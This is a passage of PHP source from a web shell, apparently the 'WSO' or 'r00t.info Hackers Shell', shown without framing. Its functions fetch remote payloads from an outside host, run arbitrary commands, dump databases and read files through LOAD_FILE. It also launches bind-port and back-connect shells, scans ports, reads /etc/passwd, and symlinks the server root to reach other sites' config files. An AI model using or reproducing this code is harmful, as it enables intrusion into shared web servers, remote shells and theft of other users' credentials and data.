onsubmit="g(null,null,null,null,this.name.value);\r\nreturn false;\r\n"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'touch\': if( !empty($_POST[\'p3\']) ) { $time = strtotime($_POST[\'p3\']);\r\n if($time) { if(@touch($_POST[\'p1\'],$time,$time)) die(\'<script>g(null,null,null,null,"")</script>\');\r\n else { echo \'Fail!<script>document.mf.p3.value="";\r\n</script>\';\r\n } } else echo \'Bad time format!<script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.touch.value);\r\nreturn false;\r\n"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'mkfile\': break;\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionBypass() { printHeader();\r\n if(!file_exists(\'cpanel/cpanel.php\')){ $dizin = \'https://byr00t.co/vb/cpanel.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? 
$name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cpanel");\r\n $zip = new ZipArchive();\r\n $file = \'cpanel.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cpanel/\');\r\n if(file_exists(\'cpanel.zip\')){ @unlink(\'cpanel.zip\');\r\n } if($cikar){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cpanel/cpanel.php\')){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionConsole() { if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n echo "document.cf.cmd.value=\'\';\r\n\\n";\r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n if(preg_match("!.*cd\\s+([^;\r\n]+)$!",$_POST[\'p1\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\'cwd\'] = @getcwd();\r\n echo "document.mf.c.value=\'".$GLOBALS[\'cwd\']."\';\r\n";\r\n } } echo "document.cf.output.value+=\'".$temp."\';\r\n";\r\n echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;\r\n";\r\n $temp = ob_get_clean();\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\n\r\nvar cmds = new Array("");\r\n\r\nvar cur = 0;\r\n\r\nfunction kp(e) {\r\n var n = (window.Event) ? 
e.which : e.keyCode;\r\n\r\n if(n == 38) {\r\n cur--;\r\n\r\n if(cur>=0)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur++;\r\n\r\n } else if(n == 40) {\r\n cur++;\r\n\r\n if(cur < cmds.length)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur--;\r\n\r\n }\r\n}\r\nfunction add(cmd) {\r\n cmds.pop();\r\n\r\n cmds.push(cmd);\r\n\r\n cmds.push("");\r\n\r\n cur = cmds.length-1;\r\n\r\n}\r\n</script>\';\r\n echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\\\'clear\\\'){document.cf.output.value=\\\'\\\';\r\ndocument.cf.cmd.value=\\\'\\\';\r\nreturn false;\r\n}add(this.cmd.value);\r\nif(this.ajax.checked){a(null,null,this.cmd.value);\r\n}else{g(null,null,this.cmd.value);\r\n} return false;\r\n"><select name=alias>\';\r\n foreach($GLOBALS[\'aliases\'] as $n => $v) { if($v == \'\') { echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\r\n continue;\r\n } echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'</select><input type=button onclick="add(document.cf.alias.value);\r\nif(document.cf.ajax.checked){a(null,null,document.cf.alias.value);\r\n}else{g(null,null,document.cf.alias.value);\r\n}" value=">>"> <input type=checkbox name=ajax value=1 \'.($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;\r\n" readonly>\';\r\n if(!empty($_POST[\'p1\'])) { echo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']));\r\n } echo \'</textarea><input type=text name=cmd style="border-top:0;\r\nwidth:100%;\r\n" onkeydown="kp(event);\r\n">\';\r\n echo \'</form></div><script>document.cf.cmd.focus();\r\n</script>\';\r\n printFooter();\r\n } function actionLogout() { unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]);\r\n echo \'\r\n <!--r00t.info Hackers Shell-->\r\n 
<!--Recoded by: Smurfie-->\r\n\r\n\r\n <script>alert("Logout Successful")</script>\r\n <body bgcolor=#ffffff><center><img src="http://r00t.info/shell-dosyalar/logo.png"></center>\r\n <H1><center><p style="color: #DF0101" >r00t.info Hackers Shell</p></H1>\r\n <center>\r\n<iframe src="http://www.facebook.com/plugins/likebox.php?\r\nhref=https://www.facebook.com/r00t.info&amp;\r\nwidth=260&amp;\r\ncolorsche\r\nme=light&amp;\r\nshow_faces=true&amp;\r\nborder_color=\r\n%23fff&amp;\r\nstream=false&amp;\r\nheader=false&amp;\r\nheight=100" scrolling="no" \r\nframeborder="0" style="background:transparent;\r\n border:none;\r\n overflow:hidden;\r\n width:200px;\r\n \r\nheight:100px;\r\n" allowtransparency="true"></iframe></center>\r\n <H3><marquee scrollamount="5" scrolldelay="50" width="100%"><p style="color: #DF0101" >Wso shell</p></marquee></H3></body>\';\r\n } function actionSelfRemove() { printHeader();\r\n if($_POST[\'p1\'] == \'yes\') { if(@unlink(SELF_PATH)) die(\'Shell has been removed\');\r\n else echo \'unlink error!\';\r\n } echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n printFooter();\r\n } function actionCgi() { printHeader();\r\n if(!file_exists(\'cgi/rot.cin\')){ $dizin = \'https://byr00t.co/vb/cgi.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? 
$name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cgi");\r\n $zip = new ZipArchive();\r\n $file = \'cgi.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cgi/\');\r\n if(file_exists(\'cgi.zip\')){ @unlink(\'cgi.zip\');\r\n } if($cikar){ chmod(\'cgi/rot.cin\', 0755);\r\n echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cgi/rot.cin\')){ echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionSql() { class DbClass { var $type;\r\n var $link;\r\n var $res;\r\n function DbClass($type) { $this->type = $type;\r\n } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \'mysql\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n break;\r\n case \'pgsql\': $host = explode(\':\', $host);\r\n if(!$host[1]) $host[1]=5432;\r\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n break;\r\n } return false;\r\n } function selectdb($db) { switch($this->type) { case \'mysql\': if (@mysql_select_db($db))return true;\r\n break;\r\n } return false;\r\n } function query($str) { switch($this->type) { case \'mysql\': return $this->res = @mysql_query($str);\r\n break;\r\n case \'pgsql\': return $this->res = @pg_query($this->link,$str);\r\n break;\r\n } return false;\r\n } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;\r\n 
switch($this->type) { case \'mysql\': return @mysql_fetch_assoc($res);\r\n break;\r\n case \'pgsql\': return @pg_fetch_assoc($res);\r\n break;\r\n } return false;\r\n } function listDbs() { switch($this->type) { case \'mysql\': return $this->res = @mysql_list_dbs($this->link);\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("SELECT datname FROM pg_database");\r\n break;\r\n } return false;\r\n } function listTables() { switch($this->type) { case \'mysql\': return $this->res = $this->query(\'SHOW TABLES\');\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != \'information_schema\' AND table_schema != \'pg_catalog\') or table_name = \'pg_user\'");\r\n break;\r\n } return false;\r\n } function error() { switch($this->type) { case \'mysql\': return @mysql_error($this->link);\r\n break;\r\n case \'pgsql\': return @pg_last_error($this->link);\r\n break;\r\n } return false;\r\n } function setCharset($str) { switch($this->type) { case \'mysql\': if(function_exists(\'mysql_set_charset\')) return @mysql_set_charset($str, $this->link);\r\n else $this->query(\'SET CHARSET \'.$str);\r\n break;\r\n case \'mysql\': return @pg_set_client_encoding($this->link, $str);\r\n break;\r\n } return false;\r\n } function dump($table) { switch($this->type) { case \'mysql\': $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n $create = mysql_fetch_array($res);\r\n echo $create[1].";\r\n\\n\\n";\r\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n $columns[] = "`".$k."`";\r\n } echo \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n case \'pgsql\': $this->query(\'SELECT * FROM \'.$table);\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as 
$k=>$v) { $item[$k] = "\'".addslashes($v)."\'";\r\n $columns[] = $k;\r\n } echo \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n } return false;\r\n } };\r\n $db = new DbClass(@$_POST[\'type\']);\r\n if(@$_POST[\'p2\']==\'download\') { ob_start("ob_gzhandler", 4096);\r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n $db->selectdb($_POST[\'sql_base\']);\r\n header("Content-Disposition: attachment;\r\n filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v) $db->dump($v);\r\n exit;\r\n } printHeader();\r\n echo \'<h1>Sql browser</h1><div class=content>\r\n <form name="sf" method="post">\r\n <table cellpadding="2" cellspacing="0">\r\n <tr>\r\n <td>Type</td>\r\n <td>Host</td>\r\n <td>Login</td>\r\n <td>Password</td>\r\n <td>Database</td>\r\n <td></td>\r\n </tr>\r\n <tr>\r\n <input type=hidden name=a value=Sql>\r\n <input type=hidden name=p1 value=\\\'query\\\'>\r\n <input type=hidden name=p2>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <td>\r\n <select name=\\\'type\\\'>\r\n <option value="mysql" \'.(@$_POST[\'type\']==\'mysql\'?\'selected\':\'\').\'>MySql</option>\r\n <option value="pgsql" \'.(@$_POST[\'type\']==\'pgsql\'?\'selected\':\'\').\'>PostgreSql</option>\r\n </select></td>\r\n <td><input type=text name=sql_host value="\'.(empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])).\'"></td>\r\n <td><input type=text name=sql_login value="\'.(empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])).\'"></td>\r\n <td><input type=text name=sql_pass value="\'.(empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])).\'"></td>\r\n <td>\';\r\n $tmp = "<input type=text name=sql_base 
value=\'\'>";\r\n if(isset($_POST[\'sql_host\'])){ if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\');\r\n break;\r\n case "UTF-8": $db->setCharset(\'utf8\');\r\n break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\');\r\n break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\');\r\n break;\r\n case "cp866": $db->setCharset(\'cp866\');\r\n break;\r\n } $db->listDbs();\r\n echo "<select name=sql_base><option value=\'\'></option>";\r\n while($item = $db->fetch()) { list($key, $value) = each($item);\r\n echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n } echo \'</select>\';\r\n } else echo $tmp;\r\n }else echo $tmp;\r\n echo \'</td>\r\n <td><input type=submit value=">>"></td>\r\n </tr>\r\n </table>\r\n <script>\r\n function st(t,l) {\r\n document.sf.p1.value = \\\'select\\\';\r\n\r\n document.sf.p2.value = t;\r\n\r\n if(l!=null)document.sf.p3.value = l;\r\n\r\n document.sf.submit();\r\n\r\n }\r\n function is() {\r\n for(i=0;\r\ni<document.sf.elements[\\\'tbl[]\\\'].length;\r\n++i)\r\n document.sf.elements[\\\'tbl[]\\\'][i].checked = !document.sf.elements[\\\'tbl[]\\\'][i].checked;\r\n\r\n }\r\n </script>\';\r\n if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n if(!empty($_POST[\'sql_base\'])){ $db->selectdb($_POST[\'sql_base\']);\r\n echo "<tr><td width=1 style=\'border-top:2px solid #666;\r\nborder-right:2px solid #666;\r\n\'><span>Tables:</span><br><br>";\r\n $tbls_res = $db->listTables();\r\n while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item);\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n $value = htmlspecialchars($value);\r\n echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'>&nbsp;\r\n<a href=# onclick=\\"st(\'".$value."\')\\">".$value."</a> 
(".$n[\'n\'].")</nobr><br>";\r\n } echo "<input type=\'checkbox\' onclick=\'is();\r\n\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";\r\ndocument.sf.submit();\r\n\'></td><td style=\'border-top:2px solid #666;\r\n\'>";\r\n if(@$_POST[\'p1\'] == \'select\') { $_POST[\'p1\'] = \'query\';\r\n $db->query(\'SELECT COUNT(*) as n FROM \'.$_POST[\'p2\'].\'\');\r\n $num = $db->fetch();\r\n $num = $num[\'n\'];\r\n echo "<span>".$_POST[\'p2\']."</span> ($num) ";\r\n for($i=0;\r\n$i<($num/30);\r\n$i++) if($i != (int)$_POST[\'p3\']) echo "<a href=\'#\' onclick=\'st(\\"".$_POST[\'p2\']."\\", $i)\'>",($i+1),"</a> ";\r\n else echo ($i+1)," ";\r\n if($_POST[\'type\']==\'pgsql\') $_POST[\'p3\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n else $_POST[\'p3\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n echo "<br><br>";\r\n } if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p3\'])) { $db->query(@$_POST[\'p3\']);\r\n if($db->res !== false) { $title = false;\r\n echo \'<table width=100% cellspacing=0 cellpadding=2 class=main>\';\r\n $line = 1;\r\n while($item = $db->fetch()) { if(!$title) { echo \'<tr>\';\r\n foreach($item as $key => $value) echo \'<th>\'.$key.\'</th>\';\r\n reset($item);\r\n $title=true;\r\n echo \'</tr><tr>\';\r\n $line = 2;\r\n } echo \'<tr class="l\'.$line.\'">\';\r\n $line = $line==1?2:1;\r\n foreach($item as $key => $value) { if($value == null) echo \'<td><i>null</i></td>\';\r\n else echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n } echo \'</tr>\';\r\n } echo \'</table>\';\r\n } else { echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n } } echo "<br><textarea name=\'p3\' style=\'width:100%;\r\nheight:100px\'>".@htmlspecialchars($_POST[\'p3\'])."</textarea><br/><input type=submit value=\'Execute\'>";\r\n echo "</td></tr>";\r\n } echo "</table></form><br/><form 
onsubmit=\'document.sf.p1.value=\\"loadfile\\";\r\ndocument.sf.p2.value=this.f.value;\r\ndocument.sf.submit();\r\nreturn false;\r\n\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";\r\n if(@$_POST[\'p1\'] == \'loadfile\') { $db->query("SELECT LOAD_FILE(\'".addslashes($_POST[\'p2\'])."\') as file");\r\n $file = $db->fetch();\r\n echo \'<pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionNetwork() { printHeader();\r\n $back_connect_c="";\r\n $back_connect_p="";\r\n $bind_port_c="";\r\n $bind_port_p="";\r\n echo \'<h1>Network tools</h1><div class=content>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);\r\nreturn false;\r\n">\r\n <br /><span>Bind port to /bin/sh</span><br/>\r\n Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Password: <input type=\\\'text\\\' name=\\\'pass\\\' value=\\\'smurf\\\'> Using: <select name="using"><option value=\\\'bpc\\\'>C</option><option value=\\\'bpp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);\r\nreturn false;\r\n">\r\n <br /><br /><span>Back-connect to</span><br/>\r\n Server: <input type=\\\'text\\\' name=\\\'server\\\' value="\'.$_SERVER[\'REMOTE_ADDR\'].\'"> Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Using: <select name="using"><option value=\\\'bcc\\\'>C</option><option value=\\\'bcp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form><br>\';\r\n if(isset($_POST[\'p1\'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n @fclose($w);\r\n } } if($_POST[\'p1\'] == \'bpc\') { 
cf("/tmp/bp.c",$bind_port_c);\r\n $out = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n @unlink("/tmp/bp.c");\r\n $out .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp")."</pre>";\r\n } if($_POST[\'p1\'] == \'bpp\') { cf("/tmp/bp.pl",$bind_port_p);\r\n $out = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp.pl")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcc\') { cf("/tmp/bc.c",$back_connect_c);\r\n $out = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n @unlink("/tmp/bc.c");\r\n $out .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcp\') { cf("/tmp/bc.pl",$back_connect_p);\r\n $out = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc.pl")."</pre>";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionPortScanner() { printHeader();\r\n echo \'<h1>Port Scanner</h1>\';\r\n echo \'<div class="content">\';\r\n echo \'<form action="" method="post">\';\r\n if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){ $start = strip_tags($_POST[\'start\']);\r\n $end = strip_tags($_POST[\'end\']);\r\n $host = strip_tags($_POST[\'host\']);\r\n for($i = $start;\r\n $i<=$end;\r\n $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n if($fp){ echo \'Port \'.$i.\' is <font color=green>open</font><br>\';\r\n } flush();\r\n } } else { echo \'<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">\r\n <input type="hidden" name="c" value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type="hidden" name="charset" value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n Host: <input type="text" name="host" value="localhost"/><br /><br />\r\n Port start: <input 
type="text" name="start" value="0"/><br /><br />\r\n Port end:<input type="text" name="end" value="5000"/><br /><br />\r\n <input type="submit" value="Scan Ports" />\r\n </form></center><br /><br />\';\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionReadable() { printHeader();\r\n echo \'<h1>Readable Dirs</h1>\';\r\n echo \'<div class="content">\';\r\n $sm = ini_get(\'safe_mode\');\r\n if($sm) { echo \'<br /><b>Error: safe_mode = on</b><br /><br />\';\r\n } else { @$passwd = fopen(\'/etc/passwd\',\'r\');\r\n if (!$passwd) { echo \'<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />\';\r\n } else { $pub = array();\r\n $users = array();\r\n $conf = array();\r\n $i = 0;\r\n while(!feof($passwd)) { $str = fgets($passwd);\r\n if ($i > 35) { $pos = strpos($str,\':\');\r\n $username = substr($str,0,$pos);\r\n $dirz = \'/home/\'.$username.\'/public_html/\';\r\n if (($username != \'\')) { if (is_readable($dirz)) { array_push($users,$username);\r\n array_push($pub,$dirz);\r\n } } } $i++;\r\n } echo \'<br><br>\';\r\n echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\\n"."<br />";\r\n echo "[+] Founded ".sizeof($pub)." 
readable public_html directories\\n"."<br /><br /><br />";\r\n foreach ($users as $user) { $path = "/home/$user/public_html/";\r\n echo $path."<br>";\r\n } echo "<br /><br /><br />[+] Complete...\\n"."<br />";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionSymlink() { printHeader();\r\n echo \'<h1>Symlink</h1>\';\r\n $furl = \'http://\'.$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];\r\n $expld = explode(\'/\',$furl );\r\n $burl =str_replace(end($expld),\'\',$furl);\r\n echo \'<div class="content"><center>\r\n <h3>[ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'website\\\',null)">Domains</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'whole\\\',null)">Whole Server Symlink</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'config\\\',null)">Config files symlink</a> ]</h3></center>\';\r\n if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'website\') { echo "<center>";\r\n $d0mains = @file("/etc/named.conf");\r\n if(!$d0mains){ echo "<pre class=ml1 style=\'margin-top:5px\'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=center class=\'main\' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";\r\n $unk = array();\r\n foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n flush();\r\n if(strlen(trim($domains[1][0])) > 2){ $unk[] = $domains[1][0];\r\n flush();\r\n } } } $count=1;\r\n $unk = array_unique($unk);\r\n $l=0;\r\n foreach($unk as $d){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));\r\n echo "<tr".($l?\' class=l1\':\'\')."><td>".$count."</td><td><a href=http://".$d."/>".$d."</a></td><td>".$user[\'name\']."</td></tr>";\r\n flush();\r\n $count++;\r\n $l=$l?0:1;\r\n } echo "</table>";\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'whole\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType 
text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp =@fopen (\'sym/.htaccess\',\'w\');\r\n fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";\r\n $count=1;\r\n $mck = array();\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0];\r\n } } } $mck = array_unique($mck);\r\n $l=0;\r\n foreach($mck as $d) { $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$d));\r\n $ddt = $user[\'name\'];\r\n $ddt = $d;\r\n if(@eregi("\\.ir",$d) or @eregi("\\.il",$d)) { $ddt = "<div style=\' color: #FF0000 ;\r\n text-shadow: 0px 0px 1px red;\r\n \'>".$d.\'</div>\';\r\n } echo "<tr".($l?\' class=l1\':\'\')."><td>".$count++."</td><td><a target=\'_blank\' href=http://".$d.\'/>\'.$ddt.\' </a></td><td>\'.$user[\'name\']."</td><td><a href=\'sym/root/home/".$user[\'name\']."/public_html\' target=\'_blank\'>symlink </a></td></tr>";\r\n flush();\r\n $l=$l?0:1;\r\n } echo \'</table>\';\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'config\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp = @fopen (\'sym/.htaccess\',\'w\');\r\n @fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n 
if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>";\r\n $count = 1;\r\n $l=0;\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0]))>2){ $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$domain[1][0]));\r\n $c1 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/wp-config.php\';\r\n $ch01 = get_headers($c1);\r\n $cf01 = $ch01[0];\r\n $c2 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/blog/wp-config.php\';\r\n $ch02 = get_headers($c2);\r\n $cf02 = $ch02[0];\r\n $c3 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/configuration.php\';\r\n $ch03 = get_headers($c3);\r\n $cf03 = $ch03[0];\r\n $c4 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/joomla/configuration.php\';\r\n $ch04 = get_headers($c4);\r\n $cf04 = $ch04[0];\r\n $c5 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/config.php\';\r\n $ch05 = get_headers($c5);\r\n $cf05 = $ch05[0];\r\n $c6 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/vb/includes/config.php\';\r\n $ch06 = get_headers($c6);\r\n $cf06 = $ch06[0];\r\n $c7 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/forum/includes/config.php\';\r\n $ch07 = get_headers($c7);\r\n $cf07 = $ch07[0];\r\n 